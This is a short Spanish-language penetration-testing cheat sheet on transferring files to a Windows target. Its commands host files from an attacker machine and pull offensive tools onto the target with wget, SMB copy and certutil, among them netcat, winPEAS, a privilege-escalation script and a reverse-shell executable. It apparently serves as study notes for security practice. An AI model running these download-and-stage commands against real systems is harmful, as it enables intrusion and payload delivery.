File Transfers Windows

Transferencias de ficheros

// Iniciar Servidor HTTP con python3
python3 -m http.server

// Iniciar servicio de SMB
impacket-smbserver sharegerh ./directorioCompartido

Descarga de ficheros

// Descargando con wget desde powershell
wget http://192.168.0.1/nc.exe

// Descargando ficheros de un SMB
copy \\192.168.119.218\sharegerh\winPEASany.exe .

// Descargando con Certutil
certutil.exe -f -urlcache -split http://192.168.119.201:80/Invoke-MS16-032.ps1
certutil.exe -f -urlcache -split http://192.168.100.20/RevShell.exe c:\users\public\RevShell.exe
// SI encuentras alguno de estos servicios utilizalos 
// para descargar desde el kali
HTTP
FTP
TFTP
SMB

Última actualización